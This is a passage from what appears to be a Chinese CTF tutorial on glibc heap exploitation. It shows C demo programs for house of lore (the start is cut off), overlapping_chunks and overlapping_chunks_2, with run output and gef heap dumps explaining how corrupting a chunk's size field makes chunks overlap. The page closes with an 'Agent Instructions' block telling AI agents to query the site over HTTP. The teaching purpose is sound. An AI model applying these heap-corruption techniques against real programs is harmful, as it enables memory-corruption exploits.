for (i = 0; i < 7; i++) { a[i] = malloc(0x80); } for (i = 0; i < 7; i++) { free(a[i]); } memset(victim, 'A', 0x80); void *p5 = malloc(0x10); memset(p5, 'A', 0x10); intptr_t *victim_chunk = victim - 2; fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim); intptr_t* stack_buffer_1[4] = {0}; intptr_t* stack_buffer_2[6] = {0}; stack_buffer_1[0] = 0; stack_buffer_1[2] = victim_chunk; stack_buffer_1[3] = (intptr_t*)stack_buffer_2; stack_buffer_2[2] = (intptr_t*)stack_buffer_1; stack_buffer_2[3] = (intptr_t*)stack_buffer_1; // 3675 bck->fd = bin; fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1); fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2); free((void*)victim); fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim); fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]); fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); void *p2 = malloc(0x100); fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2); fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim); fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]); fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); victim[1] = (intptr_t)stack_buffer_1; fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n"); void *p3 = malloc(0x40); // empty the tcache for (i = 0; i < 7; i++) { a[i] = malloc(0x80); } char *p4 = malloc(0x80); memset(p4, 'A', 0x10); fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4); fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]); intptr_t sc = (intptr_t)jackpot; memcpy((p4+0xa8), &sc, 8); } ``` ``` $ gcc -g house_of_lore.c $ ./a.out Allocated the victim (small) chunk: 0x55674d75f260 stack_buffer_1: 0x7ffff71fb1d0 stack_buffer_2: 0x7ffff71fb1f0 Freeing the victim chunk 0x55674d75f260, it will be inserted in the unsorted bin victim->fd: 0x7f1eba392b00 victim->bk: 0x7f1eba392b00 Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x55674d75f700 The victim chunk 0x55674d75f260 will be inserted in front of the SmallBin victim->fd: 0x7f1eba392b80 victim->bk: 0x7f1eba392b80 Now emulating a vulnerability that can overwrite the victim->bk pointer This last malloc should return a chunk at the position injected in bin->bk: 0x7ffff71fb1e0 The fd pointer of stack_buffer_2 has changed: 0x7ffff71fb1e0 Nice jump d00d ``` ### overlapping\_chunks ```c #include #include #include #include int main() { intptr_t *p1,*p2,*p3,*p4; p1 = malloc(0x90 - 8); p2 = malloc(0x90 - 8); p3 = malloc(0x80 - 8); memset(p1, 'A', 0x90 - 8); memset(p2, 'A', 0x90 - 8); memset(p3, 'A', 0x80 - 8); fprintf(stderr, "Now we allocate 3 chunks on the heap\n"); fprintf(stderr, "p1=%p\np2=%p\np3=%p\n\n", p1, p2, p3); free(p2); fprintf(stderr, "Freeing the chunk p2\n"); int evil_chunk_size = 0x111; int evil_region_size = 0x110 - 8; *(p2-1) = evil_chunk_size; // Overwriting the "size" field of chunk p2 fprintf(stderr, "Emulating an overflow that can overwrite the size of the chunk p2.\n\n"); p4 = malloc(evil_region_size); fprintf(stderr, "p4: %p ~ %p\n", p4, p4+evil_region_size); fprintf(stderr, "p3: %p ~ %p\n", p3, p3+0x80); fprintf(stderr, "\nIf we memset(p4, 'B', 0xd0), we have:\n"); memset(p4, 'B', 0xd0); fprintf(stderr, "p4 = %s\n", (char *)p4); fprintf(stderr, "p3 = %s\n", (char *)p3); fprintf(stderr, "\nIf we memset(p3, 'C', 0x50), we have:\n"); memset(p3, 'C', 0x50); fprintf(stderr, "p4 = %s\n", (char *)p4); fprintf(stderr, "p3 = %s\n", (char *)p3); } ``` ``` $ gcc -g overlapping_chunks.c $ ./a.out Now we allocate 3 chunks on the heap p1=0x1e2b010 p2=0x1e2b0a0 p3=0x1e2b130 Freeing the chunk p2 Emulating an overflow that can overwrite the size of the chunk p2. p4: 0x1e2b0a0 ~ 0x1e2b8e0 p3: 0x1e2b130 ~ 0x1e2b530 If we memset(p4, 'B', 0xd0), we have: p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa p3 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa If we memset(p3, 'C', 0x50), we have: p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa p3 = CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa ``` 这个比较简单,就是堆块重叠的问题。通过一个溢出漏洞,改写 unsorted bin 中空闲堆块的 size,改变下一次 malloc 可以返回的堆块大小。 首先分配三个堆块,然后释放掉中间的一个: ``` gef➤ x/60gx 0x602010-0x10 0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 1 0x602010: 0x4141414141414141 0x4141414141414141 0x602020: 0x4141414141414141 0x4141414141414141 0x602030: 0x4141414141414141 0x4141414141414141 0x602040: 0x4141414141414141 0x4141414141414141 0x602050: 0x4141414141414141 0x4141414141414141 0x602060: 0x4141414141414141 0x4141414141414141 0x602070: 0x4141414141414141 0x4141414141414141 0x602080: 0x4141414141414141 0x4141414141414141 0x602090: 0x4141414141414141 0x0000000000000091 <-- chunk 2 [be freed] 0x6020a0: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 0x6020b0: 0x4141414141414141 0x4141414141414141 0x6020c0: 0x4141414141414141 0x4141414141414141 0x6020d0: 0x4141414141414141 0x4141414141414141 0x6020e0: 0x4141414141414141 0x4141414141414141 0x6020f0: 0x4141414141414141 0x4141414141414141 0x602100: 0x4141414141414141 0x4141414141414141 0x602110: 0x4141414141414141 0x4141414141414141 0x602120: 0x0000000000000090 0x0000000000000080 <-- chunk 3 0x602130: 0x4141414141414141 0x4141414141414141 0x602140: 0x4141414141414141 0x4141414141414141 0x602150: 0x4141414141414141 0x4141414141414141 0x602160: 0x4141414141414141 0x4141414141414141 0x602170: 0x4141414141414141 0x4141414141414141 0x602180: 0x4141414141414141 0x4141414141414141 0x602190: 0x4141414141414141 0x4141414141414141 0x6021a0: 0x4141414141414141 0x0000000000020e61 <-- top chunk 0x6021b0: 0x0000000000000000 0x0000000000000000 0x6021c0: 0x0000000000000000 0x0000000000000000 0x6021d0: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x602090, bk=0x602090 → Chunk(addr=0x6020a0, size=0x90, flags=PREV_INUSE) ``` chunk 2 被放到了 unsorted bin 中,其 size 值为 0x90。 接下来,假设我们有一个溢出漏洞,可以改写 chunk 2 的 size 值,比如这里我们将其改为 0x111,也就是原本 chunk 2 和 chunk 3 的大小相加,最后一位是 1 表示 chunk 1 是在使用的,其实有没有都无所谓。 ``` gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x602090, bk=0x602090 → Chunk(addr=0x6020a0, size=0x110, flags=PREV_INUSE) ``` 这时 unsorted bin 中的数据也更改了。 接下来 malloc 一个大小的等于 chunk 2 和 chunk 3 之和的 chunk 4,这会将 chunk 2 和 chunk 3 都包含进来: ``` gef➤ x/60gx 0x602010-0x10 0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 1 0x602010: 0x4141414141414141 0x4141414141414141 0x602020: 0x4141414141414141 0x4141414141414141 0x602030: 0x4141414141414141 0x4141414141414141 0x602040: 0x4141414141414141 0x4141414141414141 0x602050: 0x4141414141414141 0x4141414141414141 0x602060: 0x4141414141414141 0x4141414141414141 0x602070: 0x4141414141414141 0x4141414141414141 0x602080: 0x4141414141414141 0x4141414141414141 0x602090: 0x4141414141414141 0x0000000000000111 <-- chunk 4 0x6020a0: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 0x6020b0: 0x4141414141414141 0x4141414141414141 0x6020c0: 0x4141414141414141 0x4141414141414141 0x6020d0: 0x4141414141414141 0x4141414141414141 0x6020e0: 0x4141414141414141 0x4141414141414141 0x6020f0: 0x4141414141414141 0x4141414141414141 0x602100: 0x4141414141414141 0x4141414141414141 0x602110: 0x4141414141414141 0x4141414141414141 0x602120: 0x0000000000000090 0x0000000000000080 <-- chunk 3 0x602130: 0x4141414141414141 0x4141414141414141 0x602140: 0x4141414141414141 0x4141414141414141 0x602150: 0x4141414141414141 0x4141414141414141 0x602160: 0x4141414141414141 0x4141414141414141 0x602170: 0x4141414141414141 0x4141414141414141 0x602180: 0x4141414141414141 0x4141414141414141 0x602190: 0x4141414141414141 0x4141414141414141 0x6021a0: 0x4141414141414141 0x0000000000020e61 <-- top chunk 0x6021b0: 0x0000000000000000 0x0000000000000000 0x6021c0: 0x0000000000000000 0x0000000000000000 0x6021d0: 0x0000000000000000 0x0000000000000000 ``` 这样,相当于 chunk 4 和 chunk 3 就重叠了,两个 chunk 可以互相修改对方的数据。就像上面的运行结果打印出来的那样。 ### overlapping\_chunks\_2 ```c #include #include #include #include #include int main() { intptr_t *p1,*p2,*p3,*p4,*p5,*p6; unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6; int prev_in_use = 0x1; p1 = malloc(0x10); p2 = malloc(0x80); p3 = malloc(0x80); p4 = malloc(0x80); p5 = malloc(0x10); real_size_p1 = malloc_usable_size(p1); real_size_p2 = malloc_usable_size(p2); real_size_p3 = malloc_usable_size(p3); real_size_p4 = malloc_usable_size(p4); real_size_p5 = malloc_usable_size(p5); memset(p1, 'A', real_size_p1); memset(p2, 'A', real_size_p2); memset(p3, 'A', real_size_p3); memset(p4, 'A', real_size_p4); memset(p5, 'A', real_size_p5); fprintf(stderr, "Now we allocate 5 chunks on the heap\n\n"); fprintf(stderr, "chunk p1: %p ~ %p\n", p1, (unsigned char *)p1+malloc_usable_size(p1)); fprintf(stderr, "chunk p2: %p ~ %p\n", p2, (unsigned char *)p2+malloc_usable_size(p2)); fprintf(stderr, "chunk p3: %p ~ %p\n", p3, (unsigned char *)p3+malloc_usable_size(p3)); fprintf(stderr, "chunk p4: %p ~ %p\n", p4, (unsigned char *)p4+malloc_usable_size(p4)); fprintf(stderr, "chunk p5: %p ~ %p\n", p5, (unsigned char *)p5+malloc_usable_size(p5)); free(p4); fprintf(stderr, "\nLet's free the chunk p4\n\n"); fprintf(stderr, "Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3)\n\n"); *(unsigned int *)((unsigned char *)p1 + real_size_p1) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; // BUG HERE free(p2); p6 = malloc(0x1b0 - 0x10); real_size_p6 = malloc_usable_size(p6); fprintf(stderr, "Allocating a new chunk 6: %p ~ %p\n\n", p6, (unsigned char *)p6+real_size_p6); fprintf(stderr, "Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0)\n"); fprintf(stderr, "p3 before = %s\n", (char *)p3); memset(p6, 'B', 0xd0); fprintf(stderr, "p3 after = %s\n", (char *)p3); } ``` ``` $ gcc -g overlapping_chunks_2.c $ ./a.out Now we allocate 5 chunks on the heap chunk p1: 0x18c2010 ~ 0x18c2028 chunk p2: 0x18c2030 ~ 0x18c20b8 chunk p3: 0x18c20c0 ~ 0x18c2148 chunk p4: 0x18c2150 ~ 0x18c21d8 chunk p5: 0x18c21e0 ~ 0x18c21f8 Let's free the chunk p4 Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3) Allocating a new chunk 6: 0x18c2030 ~ 0x18c21d8 Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0) p3 before = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA� p3 after = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA� ``` 同样是堆块重叠的问题,前面那个是在 chunk 已经被 free,加入到了 unsorted bin 之后,再修改其 size 值,然后 malloc 一个不一样的 chunk 出来,而这里是在 free 之前修改 size 值,使 free 错误地修改了下一个 chunk 的 prev\_size 值,导致中间的 chunk 强行合并。另外前面那个重叠是相邻堆块之间的,而这里是不相邻堆块之间的。 我们需要五个堆块,假设第 chunk 1 存在溢出,可以改写第二个 chunk 2 的数据,chunk 5 的作用是防止释放 chunk 4 后被合并进 top chunk。所以我们要重叠的区域是 chunk 2 到 chunk 4。首先将 chunk 4 释放掉,注意看 chunk 5 的 prev\_size 值: ``` gef➤ x/70gx 0x602010-0x10 0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk 1 0x602010: 0x4141414141414141 0x4141414141414141 0x602020: 0x4141414141414141 0x0000000000000091 <-- chunk 2 0x602030: 0x4141414141414141 0x4141414141414141 0x602040: 0x4141414141414141 0x4141414141414141 0x602050: 0x4141414141414141 0x4141414141414141 0x602060: 0x4141414141414141 0x4141414141414141 0x602070: 0x4141414141414141 0x4141414141414141 0x602080: 0x4141414141414141 0x4141414141414141 0x602090: 0x4141414141414141 0x4141414141414141 0x6020a0: 0x4141414141414141 0x4141414141414141 0x6020b0: 0x4141414141414141 0x0000000000000091 <-- chunk 3 0x6020c0: 0x4141414141414141 0x4141414141414141 0x6020d0: 0x4141414141414141 0x4141414141414141 0x6020e0: 0x4141414141414141 0x4141414141414141 0x6020f0: 0x4141414141414141 0x4141414141414141 0x602100: 0x4141414141414141 0x4141414141414141 0x602110: 0x4141414141414141 0x4141414141414141 0x602120: 0x4141414141414141 0x4141414141414141 0x602130: 0x4141414141414141 0x4141414141414141 0x602140: 0x4141414141414141 0x0000000000000091 <-- chunk 4 [be freed] 0x602150: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x602160: 0x4141414141414141 0x4141414141414141 0x602170: 0x4141414141414141 0x4141414141414141 0x602180: 0x4141414141414141 0x4141414141414141 0x602190: 0x4141414141414141 0x4141414141414141 0x6021a0: 0x4141414141414141 0x4141414141414141 0x6021b0: 0x4141414141414141 0x4141414141414141 0x6021c0: 0x4141414141414141 0x4141414141414141 0x6021d0: 0x0000000000000090 0x0000000000000020 <-- chunk 5 <-- prev_size 0x6021e0: 0x4141414141414141 0x4141414141414141 0x6021f0: 0x4141414141414141 0x0000000000020e11 <-- top chunk 0x602200: 0x0000000000000000 0x0000000000000000 0x602210: 0x0000000000000000 0x0000000000000000 0x602220: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x602140, bk=0x602140 → Chunk(addr=0x602150, size=0x90, flags=PREV_INUSE) ``` free chunk 4 被放入 unsorted bin,大小为 0x90。 接下来是最关键的一步,利用 chunk 1 的溢出漏洞,将 chunk 2 的 size 值修改为 chunk 2 和 chunk 3 的大小之和,即 0x90+0x90+0x1=0x121,最后的 1 是标志位。这样当我们释放 chunk 2 的时候,malloc 根据这个被修改的 size 值,会以为 chunk 2 加上 chunk 3 的区域都是要释放的,然后就错误地修改了 chunk 5 的 prev\_size。接着,它发现紧邻的一块 chunk 4 也是 free 状态,就把它俩合并在了一起,组成一个大 free chunk,放进 unsorted bin 中。 ``` gef➤ x/70gx 0x602010-0x10 0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk 1 0x602010: 0x4141414141414141 0x4141414141414141 0x602020: 0x4141414141414141 0x00000000000001b1 <-- chunk 2 [be freed] <-- unsorted bin 0x602030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x602040: 0x4141414141414141 0x4141414141414141 0x602050: 0x4141414141414141 0x4141414141414141 0x602060: 0x4141414141414141 0x4141414141414141 0x602070: 0x4141414141414141 0x4141414141414141 0x602080: 0x4141414141414141 0x4141414141414141 0x602090: 0x4141414141414141 0x4141414141414141 0x6020a0: 0x4141414141414141 0x4141414141414141 0x6020b0: 0x4141414141414141 0x0000000000000091 <-- chunk 3 0x6020c0: 0x4141414141414141 0x4141414141414141 0x6020d0: 0x4141414141414141 0x4141414141414141 0x6020e0: 0x4141414141414141 0x4141414141414141 0x6020f0: 0x4141414141414141 0x4141414141414141 0x602100: 0x4141414141414141 0x4141414141414141 0x602110: 0x4141414141414141 0x4141414141414141 0x602120: 0x4141414141414141 0x4141414141414141 0x602130: 0x4141414141414141 0x4141414141414141 0x602140: 0x4141414141414141 0x0000000000000091 <-- chunk 4 [be freed] 0x602150: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 0x602160: 0x4141414141414141 0x4141414141414141 0x602170: 0x4141414141414141 0x4141414141414141 0x602180: 0x4141414141414141 0x4141414141414141 0x602190: 0x4141414141414141 0x4141414141414141 0x6021a0: 0x4141414141414141 0x4141414141414141 0x6021b0: 0x4141414141414141 0x4141414141414141 0x6021c0: 0x4141414141414141 0x4141414141414141 0x6021d0: 0x00000000000001b0 0x0000000000000020 <-- chunk 5 <-- prev_size 0x6021e0: 0x4141414141414141 0x4141414141414141 0x6021f0: 0x4141414141414141 0x0000000000020e11 <-- top chunk 0x602200: 0x0000000000000000 0x0000000000000000 0x602210: 0x0000000000000000 0x0000000000000000 0x602220: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x602020, bk=0x602020 → Chunk(addr=0x602030, size=0x1b0, flags=PREV_INUSE) ``` 现在 unsorted bin 里的 chunk 的大小为 0x1b0,即 0x90\*3。咦,所以 chunk 3 虽然是使用状态,但也被强行算在了 free chunk 的空间里了。 最后,如果我们分配一块大小为 0x1b0-0x10 的大空间,返回的堆块即是包括了 chunk 2 + chunk 3 + chunk 4 的大 chunk。这时 chunk 6 和 chunk 3 就重叠了,结果就像上面运行时打印出来的一样。 --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://firmianay.gitbook.io/ctf-all-in-one/3_topics/pwn/3.1.7_heap_exploit_2.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.